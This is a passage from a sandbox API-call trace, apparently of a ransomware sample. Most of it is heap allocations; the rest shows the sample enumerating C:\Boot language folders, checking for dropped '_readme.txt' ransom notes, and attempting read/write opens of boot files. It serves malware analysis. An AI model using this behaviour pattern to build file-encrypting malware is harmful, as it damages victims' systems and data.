| out: hHeap=0x4970000) returned 1 [0130.034] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0130.034] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.034] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.035] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.035] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.035] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.035] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.035] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.035] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.035] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0130.035] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.035] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.035] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.035] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.035] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.035] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.035] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.035] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.035] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.035] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.035] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.035] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.035] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.035] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.035] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.035] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.035] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.035] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.035] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.035] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0130.035] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.036] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0130.036] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.036] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.036] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.036] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.036] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.036] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.036] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.036] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.036] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.036] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.036] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.036] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.037] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.037] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.037] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.037] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.037] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.037] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.037] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.037] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.037] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0130.037] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.037] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.037] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.037] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.037] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.037] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.037] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.037] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.037] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.037] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0130.037] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.037] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.037] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.037] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.037] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.037] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.037] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.037] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.038] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.038] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.038] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.038] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.038] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.038] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.038] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.038] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0130.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.038] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.038] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0130.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.038] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.038] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0130.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.038] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.039] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.039] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.039] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.039] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.039] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.039] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.039] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.039] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.039] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.039] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.039] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.039] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.039] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.039] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.039] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.039] PathFindFileNameW (pszPath="C:\\Boot\\nl-NL\\") returned="nl-NL\\" [0130.039] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0130.039] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.039] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0130.040] PathFindFileNameW (pszPath="") returned="" [0130.040] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0130.040] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0130.041] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0130.041] FreeLibrary (hLibModule=0x759d0000) returned 1 [0130.041] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.041] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.041] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9d90 | out: hHeap=0x4970000) returned 1 [0130.041] PathAppendW (in: pszPath="C:\\Boot\\nl-NL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 1 [0130.041] PathFileExistsW (pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 1 [0130.041] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.041] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe38b88c0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe38b88c0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0130.042] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9d90 | out: hHeap=0x4970000) returned 1 [0130.042] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe38b88c0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe38b88c0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0130.042] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0130.042] PathFindExtensionW (pszPath="C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned=".mui" [0130.042] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0130.042] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d28 | out: hHeap=0x4970000) returned 1 [0130.042] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe38b88c0, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe38b88c0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe38b88c0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0130.042] PathFindExtensionW (pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned=".txt" [0130.042] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d28 | out: hHeap=0x4970000) returned 1 [0130.042] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe38b88c0, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe38b88c0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe38b88c0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0130.042] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0130.042] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0130.043] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0130.043] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9d90 [0130.043] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.043] PathFindFileNameW (pszPath="C:\\Boot\\pl-PL\\") returned="pl-PL\\" [0130.043] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.043] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0130.043] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0130.043] PathFindFileNameW (pszPath="") returned="" [0130.043] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.043] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0130.044] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0130.044] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x800) returned 0x7516fe8 [0130.044] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0130.044] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0xdcd2280 [0130.044] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9d90 [0130.044] FreeLibrary (hLibModule=0x759d0000) returned 1 [0130.044] PathAppendW (in: pszPath="C:\\Boot\\pl-PL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 1 [0130.044] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.044] PathFileExistsW (pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 1 [0130.044] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe38dea20, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe38dea20, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0130.045] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe38dea20, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe38dea20, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0130.045] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0130.045] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.045] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0130.045] PathFindExtensionW (pszPath="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned=".mui" [0130.045] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0130.045] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe38dea20, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe38dea20, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe38dea20, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0130.045] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.045] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0130.045] PathFindExtensionW (pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned=".txt" [0130.045] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe38dea20, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe38dea20, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe38dea20, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0130.045] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0130.046] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.046] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce97a0 | out: hHeap=0x4970000) returned 1 [0130.046] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0130.046] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce97a0 [0130.046] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0130.046] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.046] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.046] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.046] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.046] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, 